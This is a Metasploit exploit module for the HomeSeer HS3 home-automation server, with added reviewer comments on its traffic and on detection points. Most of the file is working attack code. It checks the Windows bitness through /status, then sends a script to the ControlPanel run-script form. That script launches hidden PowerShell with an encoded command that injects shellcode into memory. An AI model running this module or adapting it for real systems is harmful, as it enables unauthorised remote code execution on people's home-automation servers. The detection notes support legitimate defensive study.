HomeSeer HS3 Code Execution
require 'msf/core' | |
# Metasploit exploit module for HomeSeer HS3 (home-automation server).
# Per the module's own description it combines a file-upload issue with a
# directory traversal to get code execution; what the code actually sends is
# a script to the ControlPanel "runscript" form that launches powershell.exe
# with an encoded command carrying the selected payload.
#
# Traffic a defender would see from this module (plain HTTP, two POSTs):
#   1. POST /status with body `dir=\` - a directory listing of the root,
#      used only to decide between 32- and 64-bit Windows (#check_x64).
#   2. POST /ControlPanel with `scriptcmd=<urlencoded script>&runscript=Submit`
#      where the script is `&hs.Launch "<powershell.exe>", "-w hidden -nop
#      -ep bypass -noexit -encodedCommand <base64>", "", 0`.
# Script submissions to /ControlPanel, and powershell.exe started as a child
# of the HomeSeer process with -encodedCommand, are the natural detection
# points. No CVE or advisory is referenced anywhere in the module.
#
# NOTE(review): class name Metasploit3 and the 'Version' => '$Revision ...'
# key follow an older Metasploit module convention - confirm against the
# framework version this was written for.
class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata. Several fields are placeholders rather than data:
  # 'References' holds [ 'NA', 'NA' ] (no identifier), 'DisclosureDate' is
  # not a parseable date, and 'DefaultOptions' is empty. The single target
  # is ARCH_X86, which is why #exploit picks the 32-bit (syswow64)
  # PowerShell on 64-bit hosts.
  #
  # @param info [Hash] caller-supplied overrides merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HomeSeer Code Execution Vulnerability',
      'Description'    => %q{
This exploit abuses a file upload issue and directory traversal in order
to obtain code execution in HomeSeer HS3.
      },
      'Author'         => [ 'phikshun' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 14774 $',
      'References'     =>
        [
          [ 'NA', 'NA' ],
        ],
      'DefaultOptions' =>
        {
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 7/8 x86/x64', { 'Arch' => ARCH_X86 } ],
        ],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
      'DisclosureDate' => '0 day, yo'))
  end

  # Fingerprints the OS bitness by POSTing `dir=\` to /status and looking for
  # a "Program Files (x86)" entry in the returned listing - that directory
  # only exists on 64-bit Windows. The fact that /status returns a directory
  # listing for an arbitrary `dir` value is itself information disclosure.
  #
  # NOTE(review): `res` is used without a nil check; send_request_cgi may
  # return nil when the request fails - confirm the expected failure mode.
  #
  # @return [Boolean] true when the listing matches 64-bit Windows
  def check_x64
    print_status('Checking windows version')
    res = send_request_cgi(
      {
        'uri'    => '/status',
        'method' => 'POST',
        'data'   => "dir=\\"
      })
    if res.body =~ /Program Files \(x86\)/
      print_status('Found 64-bit Windows')
      return true
    else
      print_status('Found 32-bit Windows')
      return false
    end
  end

  # Submits a HomeSeer script through the ControlPanel "run script" form.
  # The script text is URL-encoded and sent as `scriptcmd`; the `id` value
  # `runscript_ID598385` looks like a fixed form/control identifier - TODO
  # confirm whether it is stable across HS3 builds.
  #
  # NOTE(review): the response is assigned to `res` but never inspected, so
  # the caller gets no success/failure signal (the method returns whatever
  # send_request_cgi returns).
  #
  # @param shell [String] HomeSeer script source to execute (not a shell)
  # @return [Object] the send_request_cgi response, unchecked
  def launch_shell(shell)
    shell = Rex::Text.uri_encode(shell)
    post_params = "devlist=&scriptcmd=#{shell}&id=runscript_ID598385&runscript=Submit"
    print_status('Uploading shell')
    res = send_request_cgi(
      {
        'uri'    => '/ControlPanel',
        'method' => 'POST',
        'data'   => post_params
      })
  end

  # Builds the PowerShell stager, encodes it the way `-encodedCommand`
  # expects (UTF-16LE then Base64), selects the PowerShell binary matching
  # the 32-bit payload, and hands an `hs.Launch` script to #launch_shell.
  #
  # The stager string below is a Ruby double-quoted literal, so its lines are
  # part of the emitted script and its `\"` sequences become plain quotes.
  # `#{...}` on the `[Byte[]]$sc =` line turns Rex::Text.to_hex's `\xNN\xNN`
  # output into a PowerShell byte-array literal `0xNN,0xNN,...` by replacing
  # each backslash with `,0` and dropping the leading comma.
  def exploit
    print_status('Building powershell stager')
    # Create powershell script that will inject shell code from the selected payload
    ps = "$code = @\"
[DllImport(\"kernel32.dll\")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport(\"kernel32.dll\")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport(\"msvcrt.dll\")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
\"@
$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru
[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\',',0').sub(',','')}
$size = 0x1000
if ($sc.Length -gt 0x1000) {$size = $sc.Length}
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
$winFunc::CreateThread(0,0,$x,0,0,0)"
    # Unicode (UTF-16LE) encode the script, as -encodedCommand requires
    ps_uni = Rex::Text.to_unicode(ps)
    # Base64 encode the unicode bytes
    ps_b64 = Rex::Text.encode_base64(ps_uni)
    # Final arguments for powershell: hidden window, no profile, policy
    # bypass, encoded command. These flags are a well-known detection signature.
    args = "-w hidden -nop -ep bypass -noexit -encodedCommand #{ps_b64}"
    # Backslashes are doubled in the emitted path (`c:\\windows\\...`);
    # presumably hs.Launch's script language needs them escaped - TODO confirm.
    # On 64-bit hosts the syswow64 (32-bit) PowerShell is chosen to match
    # the ARCH_X86 payload declared in the target.
    if check_x64
      psh = "c:\\\\windows\\\\syswow64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"
    else
      psh = "c:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"
    end
    # NOTE(review): looks like HomeSeer's hs.Launch(file, params, dir, wait)
    # scripting call - confirm the argument meaning against HS3 docs.
    script = "&hs.Launch \"#{psh}\", \"#{args}\", \"\", 0"
    launch_shell(script)
  end
end